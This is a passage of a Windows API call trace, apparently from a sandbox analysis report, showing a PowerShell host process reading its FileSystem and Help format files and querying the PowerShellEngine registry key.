	[0806.254] ReadFile (in: hFile=0x304, lpBuffer=0x34ea2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ea2f0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.254] ReadFile (in: hFile=0x304, lpBuffer=0x34ea2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ea2f0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.254] ReadFile (in: hFile=0x304, lpBuffer=0x34ea2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ea2f0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.255] ReadFile (in: hFile=0x304, lpBuffer=0x34ea2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ea2f0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.255] ReadFile (in: hFile=0x304, lpBuffer=0x34ea2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ea2f0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.255] ReadFile (in: hFile=0x304, lpBuffer=0x34ea2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ea2f0*, lpNumberOfBytesRead=0x1ad178*=0x119, lpOverlapped=0x0) returned 1
	[0806.255] ReadFile (in: hFile=0x304, lpBuffer=0x34ea2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ea2f0*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0806.255] CloseHandle (hObject=0x304) returned 1
	[0806.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0806.256] SetErrorMode (uMode=0x1) returned 0x1
	[0806.256] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0806.256] SetErrorMode (uMode=0x1) returned 0x1
	[0806.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0806.256] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad208 | out: phkResult=0x1ad208*=0x304) returned 0x0
	[0806.256] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad18c, lpData=0x0, lpcbData=0x1ad188*=0x0 | out: lpType=0x1ad18c*=0x1, lpData=0x0, lpcbData=0x1ad188*=0x56) returned 0x0
	[0806.257] CoTaskMemAlloc (cb=0x5a) returned 0x3c6230
	[0806.257] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad15c, lpData=0x3c6230, lpcbData=0x1ad158*=0x56 | out: lpType=0x1ad15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad158*=0x56) returned 0x0
	[0806.257] CoTaskMemFree (pv=0x3c6230) 
	[0806.257] RegCloseKey (hKey=0x304) returned 0x0
	[0806.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0806.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0806.258] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x7c490c6b, Data2=0x543e, Data3=0x4838, Data4=([0]=0x9f, [1]=0xf9, [2]=0x51, [3]=0x21, [4]=0x93, [5]=0x1d, [6]=0xa6, [7]=0x24))) returned 0x0
	[0806.258] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x2be57f70, Data2=0xd61d, Data3=0x44e1, Data4=([0]=0xb1, [1]=0xaf, [2]=0x8c, [3]=0x41, [4]=0x49, [5]=0x6b, [6]=0x97, [7]=0x5c))) returned 0x0
	[0806.259] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xd0a02cfc, Data2=0x9bb2, Data3=0x408f, Data4=([0]=0xa7, [1]=0xf3, [2]=0xbd, [3]=0x2f, [4]=0x2d, [5]=0x18, [6]=0x5b, [7]=0x89))) returned 0x0
	[0806.259] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xf93c2883, Data2=0x351f, Data3=0x4eb0, Data4=([0]=0x97, [1]=0x75, [2]=0x8a, [3]=0xfe, [4]=0x80, [5]=0x66, [6]=0x75, [7]=0x7f))) returned 0x0
	[0806.259] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0806.259] GetFileType (hFile=0x304) returned 0x1
	[0806.259] SetErrorMode (uMode=0x1) returned 0x1
	[0806.259] GetFileType (hFile=0x304) returned 0x1
	[0806.259] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.260] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.261] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.261] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.262] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.263] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.263] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.263] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.265] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.265] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.266] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.266] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.266] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.267] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.267] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.267] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.271] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.271] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.271] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.272] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.272] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.272] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.273] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.273] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.275] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.275] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.276] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.276] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.922] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.922] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.922] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.923] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.929] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.929] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.929] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.930] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.930] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.930] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.931] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.931] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.932] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.932] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.932] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.933] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.933] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.933] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.934] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.934] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.934] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.935] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.935] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.935] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.936] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.936] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.937] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.937] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.937] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.938] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.938] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.938] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.939] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.939] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.939] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0xf37, lpOverlapped=0x0) returned 1
	[0806.939] ReadFile (in: hFile=0x304, lpBuffer=0x3545b2f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3545b2f*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0806.939] ReadFile (in: hFile=0x304, lpBuffer=0x3546490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3546490*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0806.940] CloseHandle (hObject=0x304) returned 1
	[0806.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0806.940] SetErrorMode (uMode=0x1) returned 0x1
	[0806.940] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0806.940] SetErrorMode (uMode=0x1) returned 0x1
	[0806.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0806.940] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad208 | out: phkResult=0x1ad208*=0x304) returned 0x0
	[0806.941] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad18c, lpData=0x0, lpcbData=0x1ad188*=0x0 | out: lpType=0x1ad18c*=0x1, lpData=0x0, lpcbData=0x1ad188*=0x56) returned 0x0
	[0806.941] CoTaskMemAlloc (cb=0x5a) returned 0x3c6230
	[0806.941] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad15c, lpData=0x3c6230, lpcbData=0x1ad158*=0x56 | out: lpType=0x1ad15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad158*=0x56) returned 0x0
	[0806.941] CoTaskMemFree (pv=0x3c6230) 
	[0806.941] RegCloseKey (hKey=0x304) returned 0x0
	[0806.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0806.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
